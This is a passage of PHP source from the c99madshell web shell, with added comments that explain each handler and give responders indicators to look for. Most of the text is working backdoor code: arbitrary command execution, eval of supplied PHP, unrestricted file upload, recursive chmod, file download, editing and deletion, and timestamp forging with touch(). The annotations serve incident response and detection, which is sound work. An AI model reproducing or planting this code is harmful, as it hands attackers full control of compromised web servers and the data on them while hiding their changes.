// Each select is preceded by an echo of $time_array[0] (the day number), | |
// which lands as stray text inside the select element. Day options 01..31. | |
echo($time_array[0]); | |
for($i=1;$i<32;++$i) { | |
$i2 = (strlen($i)==1)?'0'.$i:$i; | |
echo('<option value="'.$i2.'" '.(($time_array[0]==$i2)?' selected':'').'>'.$i2.'</option>'); | |
} | |
echo('</select> | |
<b>Month</b> | |
<select name="month" size="1"> | |
<option value="January" '.(($time_array[1]=='01')?'selected':'').'>January ---(01)</option> | |
<option value="February" '.(($time_array[1]=='02')?'selected':'').'>February --(02)</option> | |
<option value="March" '.(($time_array[1]=='03')?'selected':'').'>March ------(03)</option> | |
<option value="April" '.(($time_array[1]=='04')?'selected':'').'>April --------(04)</option> | |
<option value="May" '.(($time_array[1]=='05')?'selected':'').'>May ---------(05)</option> | |
<option value="June" '.(($time_array[1]=='06')?'selected':'').'>June --------(06)</option> | |
<option value="July" '.(($time_array[1]=='07')?'selected':'').'>July ---------(07)</option> | |
<option value="August" '.(($time_array[1]=='08')?'selected':'').'>August -----(08)</option> | |
<option value="September" '.(($time_array[1]=='09')?'selected':'').'>September -(09)</option> | |
<option value="October" '.(($time_array[1]=='10')?'selected':'').'>October ----(10)</option> | |
<option value="November" '.(($time_array[1]=='11')?'selected':'').'>November --(11)</option> | |
<option value="December" '.(($time_array[1]=='12')?'selected':'').'>December --(12)</option> | |
</select> | |
<b>Year</b> | |
<select name="year" size="1">'); | |
// Year options 1998..2009 only. | |
echo($time_array[0]); | |
for($i=1998;$i<2010;++$i) { | |
echo('<option value="'.$i.'" '.(($time_array[2]==$i)?' selected':'').'>'.$i.'</option>'); | |
} | |
echo('</select> | |
<b>Hour </b> | |
<select name="chasi" size="1">'); | |
// The hour list (field "chasi") uses the same 01..59 loop as minutes and | |
// seconds, and none of the three lists offers 00. | |
echo($time_array[0]); | |
for($i=1;$i<60;++$i) { | |
$i2 = (strlen($i)==1)?'0'.$i:$i; | |
echo('<option value="'.$i2.'" '.(($time_array[3]==$i2)?' selected':'').'>'.$i2.'</option>'); | |
} | |
echo('</select> | |
<b>Minute </b> | |
<select name="minutes" size="1">'); | |
echo($time_array[0]); | |
for($i=1;$i<60;++$i) { | |
$i2 = (strlen($i)==1)?'0'.$i:$i; | |
echo('<option value="'.$i2.'" '.(($time_array[4]==$i2)?' selected':'').'>'.$i2.'</option>'); | |
} | |
echo('</select> | |
<b>Second </b> | |
<select name="second" size="1">'); | |
echo($time_array[0]); | |
for($i=1;$i<60;++$i) { | |
$i2 = (strlen($i)==1)?'0'.$i:$i; | |
echo('<option value="'.$i2.'" '.(($time_array[5]==$i2)?' selected':'').'>'.$i2.'</option>'); | |
} | |
echo('</select></form>'); | |
$act = 'ls'; | |
} else { | |
// The submitted fields are joined into one English date string and parsed | |
// with strtotime(); a parse failure is hidden by @ and passed on to touch(). | |
$datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds"; | |
$datar = @strtotime($datar); | |
// Same value for modification time and access time. | |
if(@touch($d.$f,$datar,$datar)) { | |
echo('<center><b><font color=green>Time was been change successfull</font></b></center>'); | |
} else { | |
echo('<center><b><font color=red>Time NOT changed!!!</font></b></center>'); | |
} | |
$act = 'ls'; | |
} | |
} | |
} | |
// act=search: searches the file system by name and optionally by content, then | |
// prints the search form again. The search itself is done by c99fsearch(), | |
// defined elsewhere; this block only prepares its inputs and, when something | |
// was found, hands the result to the listing handler through $ls_arr. | |
// NOTE(review): c99fsearch() is called with the path only, so it presumably | |
// reads $a and fills $found as globals; confirm against its definition. | |
if ($act == "search") | |
{ | |
echo "<b>Search in file-system:</b><br>"; | |
// Defaults: search below the current directory and match every name. | |
if (empty($search_in)) {$search_in = $d;} | |
if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} | |
if (empty($search_text_wwo)) {$search_text_regexp = 0;} | |
if (!empty($submit)) | |
{ | |
$found = array(); | |
$found_d = 0; | |
$found_f = 0; | |
$search_i_f = 0; | |
$search_i_d = 0; | |
// "text_regexp" reads $search_text_regxp (missing "e"), a name nothing in this | |
// excerpt sets, so the regexp checkbox for text does not reach the options. | |
$a = array | |
( | |
"name"=>@$search_name, "name_regexp"=>@$search_name_regexp, | |
"text"=>@$search_text, "text_regexp"=>@$search_text_regxp, | |
"text_wwo"=>@$search_text_wwo, | |
"text_cs"=>@$search_text_cs, | |
"text_not"=>@$search_text_not | |
); | |
// Several start directories can be given, separated by ";". | |
$in = array_unique(explode(";",$search_in)); | |
foreach($in as $v) {c99fsearch($v);} | |
if (count($found) == 0) {echo "<b>No files found!</b>";} | |
else | |
{ | |
$ls_arr = $found; | |
$disp_fullpath = TRUE; | |
$act = "ls"; | |
} | |
} | |
echo "<form method=POST> | |
<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> | |
<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp | |
<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> | |
<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".@htmlspecialchars($search_text)."</textarea> | |
<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".(@$search_text_regexp == 1?" checked":"")."> - regexp | |
<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".(@$search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only | |
<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".(@$search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive | |
<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".(@$search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text | |
<br><br><input type=submit name=submit value=\"Search\"></form>"; | |
} | |
// act=chmod: changes the permission bits of $d.$f, either from the nine | |
// owner/group/world checkboxes or from the free-text field $hand, and for a | |
// directory optionally for everything below it through setRecursPerm() | |
// (defined elsewhere). | |
// For responders: permissions in the compromised tree may have been widened | |
// here, recursively; compare modes against a baseline or a fresh install, not | |
// only file contents. | |
if ($act == "chmod") | |
{ | |
$mode = fileperms($d.$f); | |
if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} | |
else | |
{ | |
$form = TRUE; | |
if (isset($chmod_submit)) | |
{ | |
if(empty($hand)) { | |
// Nine checkbox flags are joined into a binary string and converted to octal. | |
$octet = '0'.base_convert((isset($chmod_o["r"])?1:0).(isset($chmod_o["w"])?1:0).(isset($chmod_o["x"])?1:0).(isset($chmod_g["r"])?1:0).(isset($chmod_g["w"])?1:0).(isset($chmod_g["x"])?1:0).(isset($chmod_w["r"])?1:0).(isset($chmod_w["w"])?1:0).(isset($chmod_w["x"])?1:0),2,8); | |
} else { | |
// Free-text mode: a leading 0 is added when missing. The == 0 test is a loose | |
// comparison on the first character. | |
if(substr($hand,0,1)==0) { $octet = $hand; } else {$octet = '0'.$hand; } | |
} | |
if(!isset($recurs)) $recurs = 0; | |
if(is_dir($d.$f) && $recurs== 1) { | |
// setRecursPerm() is expected to return "good:bad" counts as one string. | |
$result = setRecursPerm($d.$f,intval($octet,8)); | |
list($good, $bad) = explode(':', $result); | |
echo('<b>Result: <font color="green">'.$good.'=> Success</font>, <font color="red">'.$bad.'=>BAD</font><b><br>'); | |
} else { | |
if (@chmod($d.$f,intval($octet,8))) { | |
clearstatcache(); | |
$act = 'ls'; | |
$form = FALSE; | |
$err = ''; | |
} else { | |
$err = 'Can\'t chmod to '.$octet.'.'; | |
} | |
} | |
} | |
// The form is shown on first entry, after a failed chmod and after a | |
// recursive run; the recursive checkbox is pre-checked for directories. | |
if ($form) | |
{ | |
$perms = parse_perms($mode); | |
echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".(isset($err)?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=text name=hand value=\"\"><br />"; | |
if(is_dir($d.$f)) { | |
echo "<input type=checkbox NAME=recurs value=1 checked=\"checked\"> Use recursive<br>"; | |
} | |
echo "<br><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; | |
} | |
} | |
} | |
// act=upload: moves the file sent in the multipart field "uploadfile" into the | |
// current directory $d under the name supplied by the client. Nothing in this | |
// block checks the extension, the content or whether the name already exists. | |
// For responders: any file under the web root may have arrived this way and | |
// keeps its client-chosen name; multipart POSTs to the shell URL with a part | |
// named uploadfile mark each upload. | |
if ($act == "upload") { | |
$uploadmess = ''; | |
if(isset($_FILES['uploadfile']) && !empty($_FILES['uploadfile']['tmp_name'])) { | |
$uploadpath = $d; | |
$destin = $_FILES['uploadfile']["name"]; | |
if (!move_uploaded_file($_FILES['uploadfile']['tmp_name'],$uploadpath.$destin)) {$uploadmess .= "<font color=red>Error uploading file ".$_FILES['uploadfile']['name']." (can't copy \"".$_FILES['uploadfile']['tmp_name']."\" to \"".$uploadpath.$destin."\"!</font><br>";} else { | |
$uploadmess = '<font color=green>File success uploaded</font>'; | |
} | |
} | |
echo "<center><b>".$uploadmess."</b></center>"; | |
$act = 'ls'; | |
} | |
// act=delete: removes every path in $actbox (the checked rows of the listing | |
// form) through fs_rmobj(), defined elsewhere, and reports the paths that | |
// could not be removed before falling through to the listing. | |
// NOTE(review): whether fs_rmobj() removes directories recursively cannot be | |
// told from this excerpt. | |
if ($act == "delete") | |
{ | |
$delerr = ""; | |
foreach ($actbox as $v) | |
{ | |
$result = FALSE; | |
$result = fs_rmobj($v); | |
if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} | |
} | |
if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} | |
$act = "ls"; | |
} | |
// act=cmd: runs the operator-supplied string $cmd through myshellexec() | |
// (defined elsewhere in the file) with the working directory switched to $d, | |
// and prints the output either raw or HTML-escaped inside a textarea. | |
// For responders: the request is a POST whose form fields include act=cmd and | |
// a cmd field holding the command line. Where request bodies are not logged, | |
// process telemetry showing the PHP or web-server process starting child | |
// processes is the place to look. | |
if ($act == "cmd") | |
{ | |
// $chdir is not set anywhere in this excerpt; the failure is hidden by @. | |
@chdir($chdir); | |
if (!empty($submit)) | |
{ | |
echo "<b>Result of execution this command</b>:<br>"; | |
$olddir = realpath("."); | |
@chdir($d); | |
$ret = myshellexec($cmd); | |
// convert_cyr_string() was deprecated in PHP 7.4 and removed in PHP 8.0; on | |
// PHP 8 the request fails here, after the command above has already run. | |
$ret = convert_cyr_string($ret,"d","w"); | |
if ($cmd_txt) | |
{ | |
$rows = count(explode("\r\n",$ret))+1; | |
if ($rows < 10) {$rows = 10;} | |
echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | |
} | |
else {echo $ret."<br>";} | |
@chdir($olddir); | |
} | |
else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} | |
echo "<form method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".@htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; | |
} | |
// act=ls: the file manager view. Lists $ls_arr when an earlier handler (the | |
// search) filled it, otherwise the entries of $d, and prints one table row per | |
// entry with links to the other handlers plus a form for bulk delete / chmod. | |
// Links fill the fields act, d, f, ft and sort of a form referenced as | |
// document.todo (defined outside this excerpt) and submit it. The bulk form is | |
// a POST form named ls_form carrying act, d and the checked paths as actbox[]. | |
// For responders: those field names are what request bodies sent to the shell | |
// contain, where body logging or a WAF capture is available. | |
if ($act == "ls") | |
{ | |
if (count($ls_arr) > 0) {$list = $ls_arr;} | |
else | |
{ | |
$list = array(); | |
if ($h = @opendir($d)) | |
{ | |
// Entries are stored as full paths ($d already ends in a separator). | |
while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} | |
closedir($h); | |
} | |
else {} | |
} | |
if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} | |
else | |
{ | |
//Building array | |
$objects = array(); | |
$vd = "f"; //Viewing mode | |
if ($vd == "f") | |
{ | |
$objects["head"] = array(); | |
$objects["folders"] = array(); | |
$objects["links"] = array(); | |
$objects["files"] = array(); | |
// First pass: one data row per entry. Layout: [0] path, [1] "LINK"/"DIR" or | |
// the file size, [2] mtime, [3] owner/group (non-Windows only), then the | |
// raw permission bits. An entry that is neither directory nor regular file | |
// gets no [0]/[1] pair and is not added to any bucket. | |
foreach ($list as $v) | |
{ | |
$o = @basename($v); | |
$row = array(); | |
if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} | |
elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} | |
elseif (is_dir($v)) | |
{ | |
if (@is_link($v)) {$type = "LINK";} | |
else {$type = "DIR";} | |
$row[] = $v; | |
$row[] = $type; | |
} | |
elseif(@is_file($v)) {$row[] = $v; $row[] = @filesize($v);} | |
$row[] = @filemtime($v); | |
if (!$win) | |
{ | |
$ow = @posix_getpwuid(@fileowner($v)); | |
$gr = @posix_getgrgid(@filegroup($v)); | |
$row[] = ($ow["name"]?$ow["name"]:@fileowner($v))."/".($gr["name"]?$gr["name"]:@filegroup($v)); | |
} | |
$row[] = @fileperms($v); | |
if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} | |
elseif (@is_link($v)) {$objects["links"][] = $row;} | |
elseif (@is_dir($v)) {$objects["folders"][] = $row;} | |
elseif (@is_file($v)) {$objects["files"][] = $row;} | |
// $i is a counter left over from earlier code; it is reset before the | |
// second pass below. | |
$i++; | |
} | |
// Column headers; every header becomes a link that re-sorts by that column. | |
$row = array(); | |
$row[] = "<b>Name</b>"; | |
$row[] = "<b>Size</b>"; | |
$row[] = "<b>Modify</b>"; | |
if (!$win) | |
{$row[] = "<b>Owner/Group</b>";} | |
$row[] = "<b>Perms</b>"; | |
$row[] = "<b>Action</b>"; | |
// parsesort() (defined elsewhere) splits $sort into column index and | |
// direction; anything other than "a" is treated as descending. | |
$parsesort = parsesort($sort); | |
$sort = $parsesort[0].$parsesort[1]; | |
$k = $parsesort[0]; | |
if ($parsesort[1] != "a") {$parsesort[1] = "d";} | |
$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$k.($parsesort[1] == "a"?"d":"a").";document.todo.submit();\">"; | |
$row[$k] .= $y; | |
for($i=0;$i<count($row)-1;$i++) | |
{ | |
if ($i != $k) {$row[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$i.$parsesort[1]."';document.todo.submit();\">".$row[$i]."</a>";} | |
} | |
// tabsort() is defined elsewhere; $v is set just before the calls. | |
// NOTE(review): tabsort() presumably reads $v as the sort column; confirm. | |
// Links are sorted but not reversed for descending order. | |
$v = $parsesort[0]; | |
usort($objects["folders"], "tabsort"); | |
usort($objects["links"], "tabsort"); | |
usort($objects["files"], "tabsort"); | |
if ($parsesort[1] == "d") | |
{ | |
$objects["folders"] = array_reverse($objects["folders"]); | |
$objects["files"] = array_reverse($objects["files"]); | |
} | |
$objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); | |
$tab = array(); | |
$tab["cols"] = array($row); | |
$tab["head"] = array(); | |
$tab["folders"] = array(); | |
$tab["links"] = array(); | |
$tab["files"] = array(); | |
$i = 0; | |
// Second pass: turns each data row into HTML cells. | |
foreach ($objects as $a) | |
{ | |
$v = $a[0]; | |
$o = basename($v); | |
$dir = dirname($v); | |
if ($disp_fullpath) {$disppath = $v;} | |
else {$disppath = $o;} | |
$disppath = str2mini($disppath,60); | |
$uo = urlencode($o); | |
$ud = urlencode($dir); | |
$uv = urlencode($v); | |
$row = array(); | |
if ($o == ".") | |
{ | |
$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(@realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>"; | |
$row[] = "LINK"; | |
} | |
elseif ($o == "..") | |
{ | |
$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(@realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>"; | |
$row[] = "LINK"; | |
} | |
elseif (is_dir($v)) | |
{ | |
if (is_link($v)) | |
{ | |
$disppath .= " => ".readlink($v); | |
$type = "LINK"; | |
$row[] = " <a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>"; } | |
else | |
{ | |
$type = "DIR"; | |
$row[] = " <a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>"; | |
} | |
$row[] = $type; | |
} | |
elseif(is_file($v)) | |
{ | |
$row[] = " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.d.value='".$ud."';document.todo.ft.value='edit';document.todo.f.value='".$uo."';document.todo.submit();\">".$disppath."</a>"; | |
$row[] = view_size($a[1]); | |
} | |
// The timestamp cell links to the touch handler, the permission cell to the | |
// chmod handler. | |
$row[] = '<a href="#" onclick="document.todo.act.value=\'touch\';document.todo.d.value=\''.$ud.'\';document.todo.f.value=\''.$uo.'\';document.todo.submit();">'.@date("d.m.Y H:i:s",$a[2]).'</a>'; | |
if (!$win) {$row[] = $a[3];} | |
$row[] = " <a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\"><b>".view_perms_color($v)."</b></a>"; | |
// The "." row gets the toggle-all checkbox and does not consume an id. | |
if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} | |
else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} | |
// Files also get E (edit), D (download) and X (delete) links. | |
if (@is_dir($v)){$row[] = $checkbox;} | |
else {$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='edit';document.todo.d.value='".$ud."';document.todo.submit();\">E</a> <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">D</a> <a href=\"#\" onclick=\"document.todo.act.value='delete';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">X</a> ".$checkbox;} | |
if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} | |
elseif (@is_link($v)) {$tab["links"][] = $row;} | |
elseif (@is_dir($v)) {$tab["folders"][] = $row;} | |
elseif (@is_file($v)) {$tab["files"][] = $row;} | |
$i++; | |
} | |
} | |
//Compiling table | |
$table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); | |
// The hidden fields act and d are written without quotes and $d without | |
// escaping, unlike the other handlers, which use $dispd. | |
echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; | |
foreach($table as $row) | |
{ | |
echo "<tr>\r\n"; | |
foreach($row as $v) {echo "<td>".$v."</td>\r\n";} | |
echo "</tr>\r\n"; | |
} | |
// Client-side helpers for select all / invert, then the bulk-action select. | |
echo "</table><hr size=\"1\" noshade><p align=\"right\"> | |
<script> | |
function ls_setcheckboxall(status) | |
{ | |
var id = 0; | |
var num = ".(count($table)-2)."; | |
while (id <= num) | |
{ | |
document.getElementById('actbox'+id).checked = status; | |
id++; | |
} | |
} | |
function ls_reverse_all() | |
{ | |
var id = 0; | |
var num = ".(count($table)-2)."; | |
while (id <= num) | |
{ | |
document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; | |
id++; | |
} | |
} | |
</script> | |
<input type=\"button\" onclick=\"ls_setcheckboxall(1);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(0);\" value=\"Unselect all\"><b>"; | |
echo "<select name=act><option value=\"".$act."\">With selected:</option>"; | |
echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; | |
echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; | |
echo "</select> <input type=submit value=\"Confirm\"></p>"; | |
echo "</form>"; | |
} | |
} | |
// act=eval: passes the operator-supplied string $eval to eval() with the | |
// working directory switched to $d, and prints what the code wrote to the | |
// output buffer, either raw or HTML-escaped inside a textarea. | |
// For responders: the request is a POST whose form fields include act=eval and | |
// an eval field holding PHP source. Code run this way never exists as a file | |
// on disk, so file-system sweeps alone do not show what was executed. | |
if ($act == "eval") | |
{ | |
if (!empty($eval)) | |
{ | |
echo "<b>Result of execution this PHP-code</b>:<br>"; | |
$tmp = ob_get_contents(); | |
$olddir = realpath("."); | |
@chdir($d); | |
// $tmp holds the page rendered so far. When it is non-empty the buffer is | |
// cleared, the code runs, its output is captured into $ret and the page is | |
// printed again in front of the result. | |
if ($tmp) | |
{ | |
ob_clean(); | |
eval($eval); | |
$ret = ob_get_contents(); | |
// convert_cyr_string() was deprecated in PHP 7.4 and removed in PHP 8.0; on | |
// PHP 8 the request fails here, after the eval() above has already run. | |
$ret = convert_cyr_string($ret,"d","w"); | |
ob_clean(); | |
echo $tmp; | |
if ($eval_txt) | |
{ | |
$rows = count(explode("\r\n",$ret))+1; | |
if ($rows < 10) {$rows = 10;} | |
echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | |
} | |
else {echo $ret."<br>";} | |
} | |
else | |
{ | |
if ($eval_txt) | |
{ | |
echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; | |
eval($eval); | |
echo "</textarea>"; | |
} | |
// In this branch eval() is not called and $ret was never assigned. | |
else {echo $ret;} | |
} | |
@chdir($olddir); | |
} | |
else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} | |
echo "<form method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".@htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; | |
} | |
/*
 * File manager action of the web shell (act=f).
 * Operates on the path $d.$f and selects the operation from $ft:
 * html, txt, code, download, edit or delete. Everything here runs with the
 * privileges of the PHP / web-server process, so any file that account can
 * read, write or remove is exposed through this panel.
 *
 * Defender notes: after finding this file, treat every file readable by the
 * web-server account (configuration, credentials, keys) as disclosed and
 * every writable file as possibly modified.
 */
if ($act == "f") | |
{ | |
// Unreadable path or a directory, and not in edit mode: report the problem.
if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") | |
{ | |
if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} | |
// Missing file: offer a "Create" link that resubmits the "todo" form with ft=edit and c=1.
else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='edit';document.todo.c.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><u>Create</u></a></center>";} | |
} | |
else | |
{ | |
// Pairs of (link label, $ft value) for the mode links printed above the file.
$arr = array( | |
array("HTML","html"), | |
array("TXT","txt"), | |
array("CODE","code"), | |
array("DOWNLOAD","download"), | |
array("EDIT","edit"), | |
array("DELETE","delete") | |
); | |
// The whole file is read into memory up front; read errors are suppressed.
$r = @file_get_contents($d.$f); | |
// view_size() and view_perms_color() are defined outside this part of the file.
echo "<b>Viewing file: ".$f." (".view_size(@filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>"; | |
foreach($arr as $t) | |
{ | |
echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".$t[0]."</b></a>"; | |
echo " |"; | |
} | |
echo "<hr size=\"1\" noshade>"; | |
if ($ft == "download") | |
{ | |
// Drop the buffered page, send the raw file as an attachment and stop via
// c99shexit() (defined outside this part of the file).
@ob_clean(); | |
header("Content-type: application/octet-stream"); | |
header("Content-length: ".filesize($d.$f)); | |
header("Content-disposition: attachment; filename=\"".$f."\";"); | |
echo($r); | |
c99shexit(); | |
} elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} elseif ($ft == "html") | |
{ | |
// html mode echoes the file unescaped; with $white set, the buffered page is
// discarded first and the script exits right after.
if ($white) {@ob_clean();} | |
echo $r; | |
if ($white) {c99shexit();} | |
} elseif ($ft == "code") { | |
// code mode renders the file with PHP's built-in highlight_file().
echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; | |
if (!empty($white)) {@ob_clean();} | |
highlight_file($d.$f); | |
if (!empty($white)) {c99shexit();} | |
echo "</div>"; | |
} elseif($ft== 'delete') { | |
// fs_rmobj() is defined outside this part of the file; only its result is reported.
if(!fs_rmobj($d.$f)){ | |
echo('<font color="red">Delete error</font>'); | |
} else { | |
echo('<font color="green">Delete succes</font>'); | |
} | |
} elseif ($ft == "edit") { | |
// save_file() is defined near the top of the file. The part visible there
// records filemtime() and the permission bits and chmods an unwritable file
// to 0777 before writing.
// NOTE(review): presumably the old mtime and mode are restored afterwards
// (rest of its body not visible here). If so, modification times alone will
// not reveal edited files; compare content hashes against a known-good copy.
if (!empty($submit)) { | |
if(save_file($d.$f, $edit_text)) { | |
echo('<b>Saved!</b>'); | |
} else { | |
echo('<b>Can\'t write to file!</b>'); | |
} | |
// The editor is re-populated with the submitted text even when the save failed.
$r = $edit_text; | |
} | |
echo "<form method=\"POST\"><input name='act' type='hidden' value='f'><input name='f' type='hidden' value='".urlencode($f)."'><input name='ft' type='hidden' value='edit'><input name='d' type='hidden' value='".urlencode($d)."'><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"180\" rows=\"25\">".htmlspecialchars($r)."</textarea></form>"; | |
} | |
} | |
} | |
/*
 * Static footer panel ("minipanel") printed on every page of the shell.
 * Each form below has no action attribute, so it posts back to the same
 * script, with a hidden "act" value selecting the handler: cmd, search,
 * upload, mkdir, mkfile, ls or gofile. $dispd pre-fills the directory fields
 * and $cmdaliases fills the command drop-down; both are set outside this part
 * of the file, as are $wdt, $shver, $lastdir and c99shexit().
 *
 * Defender notes: the literal banner text "c99madshell" and the field names
 * used here (act, d, cmd, cmd_txt, search_name, search_name_regexp,
 * uploadfile, mkdir, mkfile) are fixed strings in this sample. They are
 * usable for signature scans of web roots and for request-body rules, but
 * obfuscated copies will not contain them in clear text.
 */
?> | |
</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> | |
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: Command execute ::</b></p></td></tr> | |
